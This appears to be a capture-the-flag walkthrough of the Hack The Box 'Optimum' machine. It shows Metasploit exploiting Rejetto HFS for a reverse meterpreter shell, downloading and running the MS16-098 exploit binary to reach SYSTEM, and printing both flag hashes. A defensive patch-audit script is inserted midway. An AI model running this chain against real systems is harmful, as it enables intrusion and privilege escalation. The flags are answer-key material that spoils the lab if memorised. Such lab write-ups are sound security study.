This time I opened two ports on the container:
docker run -p 1234:1234 -p 8080:8080 -t -i htb /bin/bash
The scan shows that HFS (HttpFileServer) is running on port 80.
# nmap -A -n -F -T5 optimum.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-05 14:29 UTC
Nmap scan report for optimum.htb (10.10.10.8)
Host is up (0.042s latency).
Not shown: 99 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: print server|printer
Running: HP embedded
OS CPE: cpe:/h:hp:jetdirect_170x cpe:/h:hp:inkjet_3000
OS details: HP 170X print server or Inkjet 3000 printer, HP LaserJet 4250 printer
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Attack the HFS vulnerability with msfconsole.
# msfconsole
=[ metasploit v5.0.100-dev ]
+ -- --=[ 2046 exploits - 1106 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u <session_id>
msf5 > search hfs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/git_client_command_exec 2014-12-18 excellent No Malicious Git and Mercurial HTTP Server For CVE-2014-9390
1 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index, for example use 1 or use exploit/windows/http/rejetto_hfs_exec
msf5 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.17.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS optimum.htb
RHOSTS => optimum.htb
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.6
LHOST => 10.10.14.14
msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 1234
LPORT => 1234
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
[-] Handler failed to bind to 10.10.14.14:1234:- -
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Using URL: http://0.0.0.0:8080/JaNzZ3CB
[*] Local IP: http://172.17.0.2:8080/JaNzZ3CB
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /JaNzZ3CB
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:46836) at 2020-08-05 16:23:53 +0000
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\ZOcsozkNyOEfb.vbs' on the target
meterpreter >
[!] Tried to delete %TEMP%\ZOcsozkNyOEfb.vbs, unknown result
getuid
Server username: OPTIMUM\kostas
meterpreter > shell
Process 1324 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39409d7b994a9a1389ebf38ef5f73
Use Windows-Exploit-Suggester to look for privilege-escalation vulnerabilities.
meterpreter > execute -f "cmd.exe /c systeminfo > systeminfo.txt"
Process 3604 created.
meterpreter > download systeminfo.txt
[*] Downloading: systeminfo.txt -> systeminfo.txt
[*] Downloaded 3.26 KiB of 3.26 KiB (100.0%): systeminfo.txt -> systeminfo.txt
[*] download   : systeminfo.txt -> systeminfo.txt
meterpreter > bg
[*] Backgrounding session 1..
msf5 exploit(windows/http/rejetto_hfs_exec) > git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
[*] exec: git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Cloning into 'Windows-Exploit-Suggester'...
remote: Enumerating objects: 120, done.
remote: Total 120 (delta 0), reused 0 (delta 0), pack-reused 120
Receiving objects: 100% (120/120), 169.26 KiB | 365.00 KiB/s, done.
Resolving deltas: 100% (72/72), done.
msf5 exploit(windows/http/rejetto_hfs_exec) > cd Windows-Exploit-Suggester/
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --update
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[-] please install and upgrade the python-xlrd library
msf5 exploit(windows/http/rejetto_hfs_exec) > apt install python-pip
msf5 exploit(windows/http/rejetto_hfs_exec) > python -m pip install xlrd --upgrade
...
Installing collected packages: xlrd
Successfully installed xlrd-1.2.0
msf5 exploit(windows/http/rejetto_hfs_exec) > vi systeminfo.txt
(Note: part of the file was garbled and could not be processed, so I deleted the garbled portion.)
msf5 exploit(windows/http/rejetto_hfs_exec) > python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] exec: python2 windows-exploit-suggester.py --database 2020-08-08-mssb.xls --systeminfo systeminfo.txt --quiet
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution (3079904) - Critical
[E] MS15-052: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (3050514) - Important
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[E] MS15-001: Vulnerability in Windows Application Compatibility Cache Could Allow Elevation of Privilege (3023266) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[*] done
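The core check the suggester performs is a patch audit: which bulletins have no matching KB in the installed-hotfix list. As an added example (not the write-up's own code and not Windows-Exploit-Suggester's), the script below does that check over systeminfo output and handles the undecodable bytes the author hit, rather than deleting them by hand. The sample systeminfo text is constructed for illustration; the bulletin-to-KB pairs are the four taken from the suggester output above.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of the relevant lines of `systeminfo` output. One line carries
# deliberately invalid UTF-8 bytes to mimic the garbled text the write-up deleted by hand.
SAMPLE_SYSTEMINFO = (
    b"Host Name:                 OPTIMUM\r\n"
    b"OS Name:                   Microsoft Windows Server 2012 R2 Standard\r\n"
    b"OS Version:                6.3.9600 N/A Build 9600\r\n"
    b"System Locale:             \xff\xfe garbled\r\n"
    b"Hotfix(s):                 3 Hotfix(s) Installed.\r\n"
    b"                           [01]: KB2919355\r\n"
    b"                           [02]: KB3178466\r\n"
    b"                           [03]: KB3143141\r\n"
    b"Network Card(s):           1 NIC(s) Installed.\r\n"
)

# Bulletin -> KB pairs copied from the suggester output above (the number in parentheses).
# No supersedence chain is modelled, so a hit means "verify", not "confirmed vulnerable".
BULLETIN_KB = {"MS16-135": "KB3199135", "MS16-098": "KB3178466",
               "MS16-075": "KB3164038", "MS16-032": "KB3143141"}
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
FIELD_RE = re.compile(r"^(OS Name|OS Version):\s*(.+?)\s*$", re.MULTILINE)

def decode_systeminfo(raw: bytes) -> Tuple[str, int]:
    """Decode strictly if possible; otherwise replace bad bytes and count them."""
    try:
        return raw.decode("utf-8"), 0
    except UnicodeDecodeError:
        text = raw.decode("utf-8", errors="replace")
        return text, text.count("\ufffd")

def parse_systeminfo(text: str) -> Dict[str, object]:
    """Pull OS name/version and the set of installed KB ids out of systeminfo text."""
    info: Dict[str, object] = {m.group(1): m.group(2) for m in FIELD_RE.finditer(text)}
    info["hotfixes"] = {kb.upper() for kb in HOTFIX_RE.findall(text)}
    return info

def missing_bulletins(hotfixes: Set[str], catalogue: Dict[str, str]) -> List[str]:
    """Bulletins whose KB is absent from the installed hotfixes, sorted for stable output."""
    return sorted(b for b, kb in catalogue.items() if kb.upper() not in hotfixes)

def audit(raw: bytes, catalogue: Dict[str, str] = BULLETIN_KB) -> Dict[str, object]:
    text, bad = decode_systeminfo(raw)
    info = parse_systeminfo(text)
    return {"os": f"{info.get('OS Name', '?')} ({info.get('OS Version', '?')})",
            "hotfix_count": len(info["hotfixes"]), "undecodable_bytes": bad,
            "missing": missing_bulletins(info["hotfixes"], catalogue)}
```

Calling `audit(SAMPLE_SYSTEMINFO)` reports two bulletins with no installed KB and two bytes that could not be decoded, so a real run can warn instead of failing on a garbled locale line.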
Starting from MS16-098, escalate to Administrator privileges.
Search for "MS16-098 exploit" to find an exploit.

msf5 exploit(windows/http/rejetto_hfs_exec) > wget -d https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
  Id  Name  Type                     Information               Connection
  --  ----  ----                     -----------               ----------
  1         meterpreter x86/windows  OPTIMUM\kostas @ OPTIMUM  172.17.0.2:1234 -> 172.17.0.1:48926 (10.10.10.8)
msf5 exploit(windows/http/rejetto_hfs_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > upload 41020.exe
[*] uploading  : 41020.exe -> 41020.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
[*] uploaded   : 41020.exe -> 41020.exe
meterpreter > shell
Process 1100 created.
Channel 5 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>41020.exe
41020.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
C:\Users\kostas\Desktop>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
51ed1b36553c8461f4552c2e92b3eeed